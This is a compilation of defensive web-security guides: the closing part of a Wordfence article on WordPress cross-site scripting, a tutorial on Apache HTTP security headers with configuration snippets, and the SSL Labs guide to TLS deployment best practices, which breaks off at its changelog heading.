There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF. This tool is designed to work with a browser to find client-side vulnerabilities in a web app. This tool is great for administrators, as it allows them to easily test their own webapps for XSS and other client-side vulnerabilities that may be present. The flip side of this is that it can also be used by threat actors looking for potential attack targets.

One thing that is consistent in all of these exploits is the use of requests to manipulate the website. These requests can be logged, and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is that DOM-based XSS cannot be logged on the web server as these are processed entirely within the victim’s browser. The request parameters that malicious actors typically use in their requests are often common fields, such as the WordPress search parameter of $_GET[‘s’] and are often just guesswork hoping to find a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET[‘url’] which is typically used to identify the domain name of the server the website is loaded from.

Top 10 parameters in XSS attacks

Conclusion

Cross-Site Scripting (XSS) is a powerful, yet often underrated, type of vulnerability, at least when it comes to WordPress instances. While XSS has been a long-standing vulnerability in the OWASP Top 10, many people think of it only as the ability to inject content like a popup, and few realize that a malicious actor could use this type of vulnerability to inject spam into a web page or redirect a visitor to the website of their choice, convince a site visitor to provide their username and password, or even take over the website with relative ease all thanks to the capabilities of JavaScript and working knowledge of the backend platform.

One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes attackers target a zero-day vulnerability, and a patch is not available immediately, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users, including FreePremiumCare, and Response, against XSS exploits. If you believe your site has been compromised as a result of a XSS vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

Source :
https://www.wordfence.com/blog/2022/09/cross-site-scripting-the-real-wordpress-supervillain/

Seven Important Security Headers for Your Website

When it comes to securing your website, it’s all about minimizing attack surface and adding more layers of security. One strong layer that you can (and should) add is proper HTTP security headers. When responding to requests, your server should include security headers that help stop unwanted activity like XSS, MITM, and click-jacking attacks. While sending security headers does not guarantee 100% defense against all such attacks, it does help modern browsers keep things secure. So in this tutorial, we walk through seven of the most important and effective HTTP security headers to add a strong layer of security to your Apache-powered website.

Contents

Note: You can verify your site’s security headers using a free online tool such as the one provided by SecurityHeaders.com.

X-XSS-Protection

The X-XSS-Protection security header enables the XSS filter provided by modern web browsers (IE8+, Chrome, Firefox, Safari, et al). Here is the recommended configuration for this header:

# X-XSS-Protection
<IfModule mod_headers.c>
	Header set X-XSS-Protection "1; mode=block"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to block any requests containing malicious scripts. For more configuration options and further information about X-XSS-Protection, check out these resources:

X-Frame-Options

The X-Frame-Options (XFO) security header helps modern web browsers protect your visitors against clickjacking and other threats. Here is the recommended configuration for this header:

# X-Frame-Options
<IfModule mod_headers.c>
	Header set X-Frame-Options "SAMEORIGIN"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to block any frames/content requested from external locations. So if your own site includes an iframe that loads a resources from the same domain, the content will load normally. But if any iframe is included that loads resources from any other domain, the content will be blocked. For more configuration options and further information about X-Frame-Options, check out these resources:

X-Content-Type-Options

The X-Content-Type-Options security header enables supportive browsers to protect against MIME-type sniffing exploits. It does this by disabling the browser’s MIME sniffing feature, and forcing it to recognize the MIME type sent by the server. This header is very flexible and may be configured extensively, however the most common implementation looks like this:

# X-Content-Type-Options
<IfModule mod_headers.c>
	Header set X-Content-Type-Options "nosniff"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to use the MIME type declared by the origin server. There are a couple of precautions to keep in mind. First, as with any security header, it does not stop 100% of all attacks or threats; it does stop some of them, however, and thus provides another layer of protection for your site. Also note that this header currently is supported only in Chrome and later versions of Internet Explorer. Hopefully other browsers will add support in the future. For more configuration options and further information about X-Content-Type-Options, check out these resources:

Strict-Transport-Security

The Strict-Transport-Security (HSTS) header instructs modern browsers to always connect via HTTPS (secure connection via SSL/TLS), and never connect via insecure HTTP (non-SSL) protocol. While there are variations to how this header is configured, the most common implementation looks like this:

# Strict-Transport-Security
<IfModule mod_headers.c>
	Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to always use HTTPS for connections. This helps stop man-in-the-middle (MITM) and other attacks targeting insecure HTTP connections. For more configuration options and further information about Strict-Transport-Security, check out these resources:

Referrer-Policy

The Referrer-Policy security header instructs modern browsers how to handle or exclude the Referer header (yes the header normally is spelled incorrectly, missing an “r”). For those who may not be familiar, the Referer header contains information about where a request is coming from. So for example if you are at example.com and click a link from there to domain.tld, the Referer header would specify example.com as the “referring” URL.

With that in mind, the Referrer-Policy enables you to control whether or not the Referer header is included with the request. Here is an example showing how to add the Referrer-Policy header via Apache:

# Referrer-Policy
<IfModule mod_headers.c>
	Header set Referrer-Policy "same-origin"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to only set the referrer header for request from the current domain (same-origin). Keep in mind that this header is less about security and more about controlling referrer information, as is required by various rules and regulations (e.g., GDPR). For more configuration options and further information about Referrer-Policy, check out these resources:

Feature-Policy

The Feature-Policy header tells modern browsers which browser features are allowed. For example, if you want to ensure that only geolocation and vibrate features are allowed, you can configure the Feature-Policy header accordingly. It also enables you to control the origin for each specified feature. Here is an example showing how to add a Feature-Policy header via Apache:

# Feature-Policy
<IfModule mod_headers.c>
	Header set Feature-Policy "geolocation 'self'; vibrate 'none'"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to enable only geo-location and vibrate features. Keep in mind that this header is less about security and more about ensuring a smooth experience for your users. For more configuration options and further information about Feature-Policy, check out these resources:

Content-Security-Policy

The Content-Security-Policy (CSP) header tells modern browsers which dynamic resources are allowed to load. This header is especially helpful at stopping XSS attacks and other malicious activity. This header provides extensive configuration options, which will need to be fine-tuned to match the specific resources required by your site. Otherwise if the header configuration does not match your site’s requirements, some resources may not load (or work) properly.

Because of this, there isn’t one most common example to look at. So instead here are a few different examples, each allowing different types of resources.

Example 1

First example, here is a CSP directive that allows resources from a CDN, and disallows any framed content or media plugins. This example is from the Google docs page linked below.

# Content-Security-Policy - Example 1
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src https://cdn.example.com; child-src 'none'; object-src 'none'"
</IfModule>

Example 2

Second example, this CSP directive enables script resources loaded from a jQuery subdomain, and limits stylesheets and images to the current domain (self). This example is from the Mozilla docs page linked below.

# Content-Security-Policy - Example 2
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src 'none'; img-src 'self'; script-src 'self' https://code.jquery.com; style-src 'self'"
</IfModule>

Example 3

And for a third example, here is the directive I use on most of my WordPress-powered sites. Logically these sites tend to use the same types of resources, so I can keep things simple and use the following code on all sites:

# Content-Security-Policy - Example 3
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src https:; font-src https: data:; img-src https: data:; script-src https:; style-src https:;"
</IfModule>

To get a better idea of what’s happening here, let’s apply a bit of formatting to the code:

Header set Content-Security-Policy "

default-src https:; 
font-src    https: data:; 
img-src     https: data:; 
script-src  https:; 
style-src   https:;

"

Stare at that for a few moments and you should get the idea: the header is setting the allowed source(s) for fonts, images, scripts, and styles. For each of these, a secure HTTPS connection is required. The only exception is also to allow data URIs as a source for fonts and images.

So for any of these examples, when added to your site’s .htaccess file or server configuration file, the code tells supportive browsers which dynamic resources are allowed and/or not allowed. But seriously, if you’re thinking about adding the powerful Content-Security-Policy security header, take a few moments to read thru some of the documentation:

Where to get help with CSP

Yes CSP can be confusing, but there is no reason to despair. There are numerous online tools that make it easier to figure out how to implement CSP, for example here are some top sites:

A quick search for “csp test online” yields many results.

Even better, they now have “CSP generators” that literally write the code for you based on your input variables. Here are two solid looking CSP generators:

There are lots of useful tools out there to make CSP easier. Just enter your infos and copy/paste the results. If in doubt, use multiple tools and compare the results; the code should be the same. If not, don’t hesitate to reach out to the tool providers, who will be able to answer any questions, etc.

All Together

For the sake of easy copy/pasting, here is a code snippet that combines all of the above-described security headers.

Important: before adding this code to your site, make sure to read through each technique as explained in corresponding sections above. There may be important notes and information that you need to understand regarding each particular directive included in this code snippet.

# Security Headers
<IfModule mod_headers.c>
	Header set X-XSS-Protection "1; mode=block"
	Header set X-Frame-Options "SAMEORIGIN"
	Header set X-Content-Type-Options "nosniff"
	Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
	# Header set Content-Security-Policy ...
	Header set Referrer-Policy "same-origin"
	Header set Feature-Policy "geolocation 'self'; vibrate 'none'"
</IfModule>

As with each of the above techniques, this code may be added to your site via .htaccess or Apache config. Understand that this technique includes commonly used configurations for each of the included headers. You can (and should) go through each one to make sure that the configuration matches the requirements and goals of your site. Also remember to test thoroughly before going live.

Note: Notice the following line in the above “Security Headers” code snippet:

# Header set Content-Security-Policy ...

The pound sign or hash tag or whatever you want to call it means that the line is disabled and is ignored by the server. This means that the Content-Security-Policy directive is “commented out” and thus not active in this technique. Why? Because as explained previously, there is no recommended “one-size-fits-all” CSP example that works perfectly in all websites. Instead, you will need to replace the commented out line with your own properly configured CSP header, as explained above.

SSL and TLS Deployment Best Practices

Version 1.6-draft (15 January 2020)

SSL/TLS is a deceptively simple technology. It is easy to deploy, and it just works–except when it does not. The main problem is that encryption is not often easy to deploy correctly. To ensure that TLS provides the necessary security, system administrators and developers must put extra effort into properly configuring their servers and developing their applications.

In 2009, we began our work on SSL Labs because we wanted to understand how TLS was used and to remedy the lack of easy-to-use TLS tools and documentation. We have achieved some of our goals through our global surveys of TLS usage, as well as the online assessment tool, but the lack of documentation is still evident. This document is a step toward addressing that problem.

Our aim here is to provide clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application. In pursuit of clarity, we sacrifice completeness, foregoing certain advanced topics. The focus is on advice that is practical and easy to follow. For those who want more information, Section 6 gives useful pointers.

1 Private Key and Certificate

In TLS, all security starts with the server’s cryptographic identity; a strong private key is needed to prevent attackers from carrying out impersonation attacks. Equally important is to have a valid and strong certificate, which grants the private key the right to represent a particular hostname. Without these two fundamental building blocks, nothing else can be secure.

1.1 Use 2048-Bit Private Keys

For most web sites, security provided by 2,048-bit RSA keys is sufficient. The RSA public key algorithm is widely supported, which makes keys of this type a safe default choice. At 2,048 bits, such keys provide about 112 bits of security. If you want more security than this, note that RSA keys don’t scale very well. To get 128 bits of security, you need 3,072-bit RSA keys, which are noticeably slower. ECDSA keys provide an alternative that offers better security and better performance. At 256 bits, ECDSA keys provide 128 bits of security. A small number of older clients don’t support ECDSA, but modern clients do. It’s possible to get the best of both worlds and deploy with RSA and ECDSA keys simultaneously if you don’t mind the overhead of managing such a setup.

1.2 Protect Private Keys

Treat your private keys as an important asset, restricting access to the smallest possible group of employees while still keeping your arrangements practical. Recommended policies include the following:

  • Generate private keys on a trusted computer with sufficient entropy. Some CAs offer to generate private keys for you; run away from them.
  • Password-protect keys from the start to prevent compromise when they are stored in backup systems. Private key passwords don’t help much in production because a knowledgeable attacker can always retrieve the keys from process memory. There are hardware devices (called Hardware Security Modules, or HSMs) that can protect private keys even in the case of server compromise, but they are expensive and thus justifiable only for organizations with strict security requirements.
  • After compromise, revoke old certificates and generate new keys.
  • Renew certificates yearly, and more often if you can automate the process. Most sites should assume that a compromised certificate will be impossible to revoke reliably; certificates with shorter lifespans are therefore more secure in practice.
  • Unless keeping the same keys is important for public key pinning, you should also generate new private keys whenever you’re getting a new certificate.

1.3 Ensure Sufficient Hostname Coverage

Ensure that your certificates cover all the names you wish to use with a site. Your goal is to avoid invalid certificate warnings, which confuse users and weaken their confidence.

Even when you expect to use only one domain name, remember that you cannot control how your users arrive at the site or how others link to it. In most cases, you should ensure that the certificate works with and without the www prefix (e.g., that it works for both example.com and www.example.com). The rule of thumb is that a secure web server should have a certificate that is valid for every DNS name configured to point to it.

Wildcard certificates have their uses, but avoid using them if it means exposing the underlying keys to a much larger group of people, and especially if doing so crosses team or department boundaries. In other words, the fewer people there are with access to the private keys, the better. Also be aware that certificate sharing creates a bond that can be abused to transfer vulnerabilities from one web site or server to all other sites and servers that use the same certificate (even when the underlying private keys are different).

Make sure you add all the necessary domain names to Subject Alternative Name (SAN) since all the latest browsers do not check for Common Name for validation

1.4 Obtain Certificates from a Reliable CA

Select a Certification Authority (CA) that is reliable and serious about its certificate business and security. Consider the following criteria when selecting your CA:

Security posture All CAs undergo regular audits, but some are more serious about security than others. Figuring out which ones are better in this respect is not easy, but one option is to examine their security history, and, more important, how they have reacted to compromises and if they have learned from their mistakes.

Business focus CAs whose activities constitute a substantial part of their business have everything to lose if something goes terribly wrong, and they probably won’t neglect their certificate division by chasing potentially more lucrative opportunities elsewhere.

Services offered At a minimum, your selected CA should provide support for both Certificate Revocation List (CRL) and Online Certificate Status Protocol (OCSP) revocation methods, with rock-solid network availability and performance. Many sites are happy with domain-validated certificates, but you also should consider if you’ll ever require Extended Validation (EV) certificates. In either case, you should have a choice of public key algorithm. Most web sites use RSA today, but ECDSA may become important in the future because of its performance advantages.

Certificate management options If you need a large number of certificates and operate in a complex environment, choose a CA that will give you good tools to manage them.

Support Choose a CA that will give you good support if and when you need it.

Note

For best results, acquire your certificates well in advance and at least one week before deploying them to production. This practice (1) helps avoid certificate warnings for some users who don’t have the correct time on their computers and (2) helps avoid failed revocation checks with CAs who need extra time to propagate new certificates as valid to their OCSP responders. Over time, try to extend this “warm-up” period to 1-3 months. Similarly, don’t wait until your certificates are about to expire to replace them. Leaving an extra several months there would similarly help with people whose clocks are incorrect in the other direction.

1.5 Use Strong Certificate Signature Algorithms

Certificate security depends (1) on the strength of the private key that was used to sign the certificate and (2) the strength of the hashing function used in the signature. Until recently, most certificates relied on the SHA1 hashing function, which is now considered insecure. As a result, we’re currently in transition to SHA256. As of January 2016, you shouldn’t be able to get a SHA1 certificate from a public CA. Leaf and intermediate certificates having SHA1 hashing signature are now considered insecure by browser.

1.6 Use DNS CAA

DNS CAA[8] is a standard that allows domain name owners to restrict which CAs can issue certificates for their domains. In September 2017, CA/Browser Forum mandated CAA support as part of its certificate issuance standard baseline requirements. With CAA in place, the attack surface for fraudulent certificates is reduced, effectively making sites more secure. If the CAs have automated process in place for issuance of certificates, then it should check for DNS CAA record as this would reduce the improper issuance of certificates.

It is recommended to whitelist a CA by adding a CAA record for your certificate. Add CA’s which you trust for issuing you a certificate.

2 Configuration

With correct TLS server configuration, you ensure that your credentials are properly presented to the site’s visitors, that only secure cryptographic primitives are used, and that all known weaknesses are mitigated.

2.1 Use Complete Certificate Chains

In most deployments, the server certificate alone is insufficient; two or more certificates are needed to build a complete chain of trust. A common configuration problem occurs when deploying a server with a valid certificate, but without all the necessary intermediate certificates. To avoid this situation, simply use all the certificates provided to you by your CA in the same sequence.

An invalid certificate chain effectively renders the server certificate invalid and results in browser warnings. In practice, this problem is sometimes difficult to diagnose because some browsers can reconstruct incomplete chains and some can’t. All browsers tend to cache and reuse intermediate certificates.

2.2 Use Secure Protocols

There are six protocols in the SSL/TLS family: SSL v2, SSL v3, TLS v1.0, TLS v1.1, TLS v1.2, and TLS v1.3:

  • SSL v2 is insecure and must not be used. This protocol version is so bad that it can be used to attack RSA keys and sites with the same name even if they are on an entirely different servers (the DROWN attack).
  • SSL v3 is insecure when used with HTTP (the SSLv3 POODLE attack) and weak when used with other protocols. It’s also obsolete and shouldn’t be used.
  • TLS v1.0 and TLS v1.1 are legacy protocol that shouldn’t be used, but it’s typically still necessary in practice. Its major weakness (BEAST) has been mitigated in modern browsers, but other problems remain. TLS v1.0 has been deprecated by PCI DSS. Similarly, TLS v1.0 and TLS v1.1 has been deprecated in January 2020 by modern browsers. Check the SSL Labs blog link
  • TLS v1.2 and v1.3 are both without known security issues.

TLS v1.2 or TLS v1.3 should be your main protocol because these version offers modern authenticated encryption (also known as AEAD). If you don’t support TLS v1.2 or TLS v1.3 today, your security is lacking.

In order to support older clients, you may need to continue to support TLS v1.0 and TLS v1.1 for now. However, you should plan to retire TLS v1.0 and TLS v1.1 in the near future. For example, the PCI DSS standard will require all sites that accept credit card payments to remove support for TLS v1.0 by June 2018. Similarly, modern browsers will remove the support for TLS v1.0 and TLS v1.1 by January 2020.

Benefits of using TLS v1.3:

  • Improved performance i.e improved latency
  • Improved security
  • Removed obsolete/insecure features like cipher suites, compression etc.

2.3 Use Secure Cipher Suites

To communicate securely, you must first ascertain that you are communicating directly with the desired party (and not through someone else who will eavesdrop) and exchanging data securely. In SSL and TLS, cipher suites define how secure communication takes place. They are composed from varying building blocks with the idea of achieving security through diversity. If one of the building blocks is found to be weak or insecure, you should be able to switch to another.

You should rely chiefly on the AEAD suites that provide strong authentication and key exchange, forward secrecy, and encryption of at least 128 bits. Some other, weaker suites may still be supported, provided they are negotiated only with older clients that don’t support anything better.

There are several obsolete cryptographic primitives that must be avoided:

  • Anonymous Diffie-Hellman (ADH) suites do not provide authentication.
  • NULL cipher suites provide no encryption.
  • Export cipher suites are insecure when negotiated in a connection, but they can also be used against a server that prefers stronger suites (the FREAK attack).
  • Suites with weak ciphers (112 bits or less) use encryption that can easily be broken are insecure.
  • RC4 is insecure.
  • 64-bit block cipher (3DES / DES / RC2 / IDEA) are weak.
  • Cipher suites with RSA key exchange are weak i.e. TLS_RSA

There are several cipher suites that must be preferred:

  • AEAD (Authenticated Encryption with Associated Data) cipher suites – CHACHA20_POLY1305, GCM and CCM
  • PFS (Perfect Forward Secrecy) ciphers – ECDHE_RSA, ECDHE_ECDSA, DHE_RSA, DHE_DSS, CECPQ1 and all TLS 1.3 ciphers

Use the following suite configuration, designed for both RSA and ECDSA keys, as your starting point:

TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256

Warning

We recommend that you always first test your TLS configuration in a staging environment, transferring the changes to the production environment only when certain that everything works as expected. Please note that the above is a generic list and that not all systems (especially the older ones) support all the suites. That’s why it’s important to test first.

The above example configuration uses standard TLS suite names. Some platforms use nonstandard names; please refer to the documentation for your platform for more details. For example, the following suite names would be used with OpenSSL:

ECDHE-ECDSA-AES128-GCM-SHA256
ECDHE-ECDSA-AES256-GCM-SHA384
ECDHE-ECDSA-AES128-SHA
ECDHE-ECDSA-AES256-SHA
ECDHE-ECDSA-AES128-SHA256
ECDHE-ECDSA-AES256-SHA384
ECDHE-RSA-AES128-GCM-SHA256
ECDHE-RSA-AES256-GCM-SHA384
ECDHE-RSA-AES128-SHA
ECDHE-RSA-AES256-SHA
ECDHE-RSA-AES128-SHA256
ECDHE-RSA-AES256-SHA384
DHE-RSA-AES128-GCM-SHA256
DHE-RSA-AES256-GCM-SHA384
DHE-RSA-AES128-SHA
DHE-RSA-AES256-SHA
DHE-RSA-AES128-SHA256
DHE-RSA-AES256-SHA256

2.4 Select Best Cipher Suites

In SSL v3 and later protocol versions, clients submit a list of cipher suites that they support, and servers choose one suite from the list to use for the connection. Not all servers do this well, however; some will select the first supported suite from the client’s list. Having servers actively select the best available cipher suite is critical for achieving the best security.

2.5 Use Forward Secrecy

Forward secrecy (sometimes also called perfect forward secrecy) is a protocol feature that enables secure conversations that are not dependent on the server’s private key. With cipher suites that do not provide forward secrecy, someone who can recover a server’s private key can decrypt all earlier recorded encrypted conversations. You need to support and prefer ECDHE suites in order to enable forward secrecy with modern web browsers. To support a wider range of clients, you should also use DHE suites as fallback after ECDHE. Avoid the RSA key exchange unless absolutely necessary. My proposed default configuration in Section 2.3 contains only suites that provide forward secrecy.

2.6 Use Strong Key Exchange

For the key exchange, public sites can typically choose between the classic ephemeral Diffie-Hellman key exchange (DHE) and its elliptic curve variant, ECDHE. There are other key exchange algorithms, but they’re generally insecure in one way or another. The RSA key exchange is still very popular, but it doesn’t provide forward secrecy.

In 2015, a group of researchers published new attacks against DHE; their work is known as the Logjam attack.[2] The researchers discovered that lower-strength DH key exchanges (e.g., 768 bits) can easily be broken and that some well-known 1,024-bit DH groups can be broken by state agencies. To be on the safe side, if deploying DHE, configure it with at least 2,048 bits of security. Some older clients (e.g., Java 6) might not support this level of strength. For performance reasons, most servers should prefer ECDHE, which is both stronger and faster. The secp256r1 named curve (also known as P-256) is a good choice in this case.

2.7 Mitigate Known Problems

There have been several serious attacks against SSL and TLS in recent years, but they should generally not concern you if you’re running up-to-date software and following the advice in this guide. (If you’re not, I’d advise testing your systems using SSL Labs and taking it from there.) However, nothing is perfectly secure, which is why it is a good practice to keep an eye on what happens in security. Promptly apply vendor patches if and when they become available; otherwise, rely on workarounds for mitigation.

3 Performance

Security is our main focus in this guide, but we must also pay attention to performance; a secure service that does not satisfy performance criteria will no doubt be dropped. With proper configuration, TLS can be quite fast. With modern protocols—for example, HTTP/2—it might even be faster than plaintext communication.

3.1 Avoid Too Much Security

The cryptographic handshake, which is used to establish secure connections, is an operation for which the cost is highly influenced by private key size. Using a key that is too short is insecure, but using a key that is too long will result in “too much” security and slow operation. For most web sites, using RSA keys stronger than 2,048 bits and ECDSA keys stronger than 256 bits is a waste of CPU power and might impair user experience. Similarly, there is little benefit to increasing the strength of the ephemeral key exchange beyond 2,048 bits for DHE and 256 bits for ECDHE. There are no clear benefits of using encryption above 128 bits.

3.2 Use Session Resumption

Session resumption is a performance-optimization technique that makes it possible to save the results of costly cryptographic operations and to reuse them for a period of time. A disabled or nonfunctional session resumption mechanism may introduce a significant performance penalty.

3.3 Use WAN Optimization and HTTP/2

These days, TLS overhead doesn’t come from CPU-hungry cryptographic operations, but from network latency. A TLS handshake, which can start only after the TCP handshake completes, requires a further exchange of packets and is more expensive the further away you are from the server. The best way to minimize latency is to avoid creating new connections—in other words, to keep existing connections open for a long time (keep-alives). Other techniques that provide good results include supporting modern protocols such as HTTP/2 and using WAN optimization (usually via content delivery networks).

3.4 Cache Public Content

When communicating over TLS, browsers might assume that all traffic is sensitive. They will typically use the memory to cache certain resources, but once you close the browser, all the content may be lost. To gain a performance boost and enable long-term caching of some resources, mark public resources (e.g., images) as public.

3.5 Use OCSP Stapling

OCSP stapling is an extension of the OCSP protocol that delivers revocation information as part of the TLS handshake, directly from the server. As a result, the client does not need to contact OCSP servers for out-of-band validation and the overall TLS connection time is significantly reduced. OCSP stapling is an important optimization technique, but you should be aware that not all web servers provide solid OCSP stapling implementations. Combined with a CA that has a slow or unreliable OCSP responder, such web servers might create performance issues. For best results, simulate failure conditions to see if they might impact your availability.

3.6 Use Fast Cryptographic Primitives

In addition to providing the best security, my recommended cipher suite configuration also provides the best performance. Whenever possible, use CPUs that support hardware-accelerated AES. After that, if you really want a further performance edge (probably not needed for most sites), consider using ECDSA keys.

4 HTTP and Application Security

The HTTP protocol and the surrounding platform for web application delivery continued to evolve rapidly after SSL was born. As a result of that evolution, the platform now contains features that can be used to defeat encryption. In this section, we list those features, along with ways to use them securely.

4.1 Encrypt Everything

The fact that encryption is optional is probably one of the biggest security problems today. We see the following problems:

  • No TLS on sites that need it
  • Sites that have TLS but that do not enforce it
  • Sites that mix TLS and non-TLS content, sometimes even within the same page
  • Sites with programming errors that subvert TLS

Although many of these problems can be mitigated if you know exactly what you’re doing, the only way to reliably protect web site communication is to enforce encryption throughout—without exception.

4.2 Eliminate Mixed Content

Mixed-content pages are those that are transmitted over TLS but include resources (e.g., JavaScript files, images, CSS files) that are not transmitted over TLS. Such pages are not secure. An active man-in-the-middle (MITM) attacker can piggyback on a single unprotected JavaScript resource, for example, and hijack the entire user session. Even if you follow the advice from the previous section and encrypt your entire web site, you might still end up retrieving some resources unencrypted from third-party web sites.

4.3 Understand and Acknowledge Third-Party Trust

Web sites often use third-party services activated via JavaScript code downloaded from another server. A good example of such a service is Google Analytics, which is used on large parts of the Web. Such inclusion of third-party code creates an implicit trust connection that effectively gives the other party full control over your web site. The third party may not be malicious, but large providers of such services are increasingly seen as targets. The reasoning is simple: if a large provider is compromised, the attacker is automatically given access to all the sites that depend on the service.

If you follow the advice from Section 4.2, at least your third-party links will be encrypted and thus safe from MITM attacks. However, you should go a step further than that: learn what services you use and remove them, replace them with safer alternatives, or accept the risk of their continued use. A new technology called subresource integrity (SRI) could be used to reduce the potential exposure via third-party resources.[3]

4.4 Secure Cookies

To be properly secure, a web site requires TLS, but also that all its cookies are explicitly marked as secure when they are created. Failure to secure the cookies makes it possible for an active MITM attacker to tease some information out through clever tricks, even on web sites that are 100% encrypted. For best results, consider adding cryptographic integrity validation or even encryption to your cookies.

4.5 Secure HTTP Compression

The 2012 CRIME attack showed that TLS compression can’t be implemented securely. The only solution was to disable TLS compression altogether. The following year, two further attack variations followed. TIME and BREACH focused on secrets in HTTP response bodies compressed using HTTP compression. Unlike TLS compression, HTTP compression is a necessity and can’t be turned off. Thus, to address these attacks, changes to application code need to be made.[4]

TIME and BREACH attacks are not easy to carry out, but if someone is motivated enough to use them, the impact is roughly equivalent to a successful Cross-Site Request Forgery (CSRF) attack.

4.6 Deploy HTTP Strict Transport Security

HTTP Strict Transport Security (HSTS) is a safety net for TLS. It was designed to ensure that security remains intact even in the case of configuration problems and implementation errors. To activate HSTS protection, you add a new response header to your web sites. After that, browsers that support HSTS (all modern browsers at this time) enforce it.

The goal of HSTS is simple: after activation, it does not allow any insecure communication with the web site that uses it. It achieves this goal by automatically converting all plaintext links to secure ones. As a bonus, it also disables click-through certificate warnings. (Certificate warnings are an indicator of an active MITM attack. Studies have shown that most users click through these warnings, so it is in your best interest to never allow them.)

Adding support for HSTS is the single most important improvement you can make for the TLS security of your web sites. New sites should always be designed with HSTS in mind and the old sites converted to support it wherever possible and as soon as possible. For best security, consider using HSTS preloading,[5] which embeds your HSTS configuration in modern browsers, making even the first connection to your site secure.

The following configuration example activates HSTS on the main hostname and all its subdomains for a period of one year, while also allowing preloading:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

4.7 Deploy Content Security Policy

Content Security Policy (CSP) is a security mechanism that web sites can use to restrict browser operation. Although initially designed to address Cross-Site Scripting (XSS), CSP is constantly evolving and supports features that are useful for enhancing TLS security. In particular, it can be used to restrict mixed content when it comes to third-party web sites, for which HSTS doesn’t help.

To deploy CSP to prevent third-party mixed content, use the following configuration:

Content-Security-Policy: default-src https: 'unsafe-inline' 'unsafe-eval';
                         connect-src https: wss:

Note

This is not the best way to deploy CSP. In order to provide an example that doesn’t break anything except mixed content, I had to disable some of the default security features. Over time, as you learn more about CSP, you should change your policy to bring them back.

4.8 Do Not Cache Sensitive Content

All sensitive content must be communicated only to the intended parties and treated accordingly by all devices. Although proxies do not see encrypted traffic and cannot share content among users, the use of cloud-based application delivery platforms is increasing, which is why you need to be very careful when specifying what is public and what is not.

4.9 Consider Other Threats

TLS is designed to address only one aspect of security—confidentiality and integrity of the communication between you and your users—but there are many other threats that you need to deal with. In most cases, that means ensuring that your web site does not have other weaknesses.

5 Validation

With many configuration parameters available for tweaking, it is difficult to know in advance what impact certain changes will have. Further, changes are sometimes made accidentally; software upgrades can introduce changes silently. For that reason, we advise that you use a comprehensive SSL/TLS assessment tool initially to verify your configuration to ensure that you start out secure, and then periodically to ensure that you stay secure. For public web sites, we recommend the free SSL Labs server test.[6]

6 Advanced Topics

The following advanced topics are currently outside the scope of our guide. They require a deeper understanding of SSL/TLS and Public Key Infrastructure (PKI), and they are still being debated by experts.

6.1 Public Key Pinning

Public key pinning is designed to give web site operators the means to restrict which CAs can issue certificates for their web sites. This feature has been deployed by Google for some time now (hardcoded into their browser, Chrome) and has proven to be very useful in preventing attacks and making the public aware of them. In 2014, Firefox also added support for hardcoded pinning. A standard called Public Key Pinning Extension for HTTP[7] is now available. Public key pinning addresses the biggest weakness of PKI (the fact that any CA can issue a certificate for any web site), but it comes at a cost; deploying requires significant effort and expertise, and creates risk of losing control of your site (if you end up with invalid pinning configuration). You should consider pinning largely only if you’re managing a site that might be realistically attacked via a fraudulent certificate.

6.2 DNSSEC and DANE

Domain Name System Security Extensions (DNSSEC) is a set of technologies that add integrity to the domain name system. Today, an active network attacker can easily hijack any DNS request and forge arbitrary responses. With DNSSEC, all responses can be cryptographically tracked back to the DNS root. DNS-based Authentication of Named Entities (DANE) is a separate standard that builds on top of DNSSEC to provide bindings between DNS and TLS. DANE could be used to augment the security of the existing CA-based PKI ecosystem or bypass it altogether.

Even though not everyone agrees that DNSSEC is a good direction for the Internet, support for it continues to improve. Browsers don’t yet support either DNSSEC or DANE (preferring similar features provided by HSTS and HPKP instead), but there is some indication that they are starting to be used to improve the security of email delivery.

7 Changes

The first release of this guide was on 24 February 2012. This section tracks the document changes over time, starting with version 1.3.

Version 1.3 (17 September 2013)

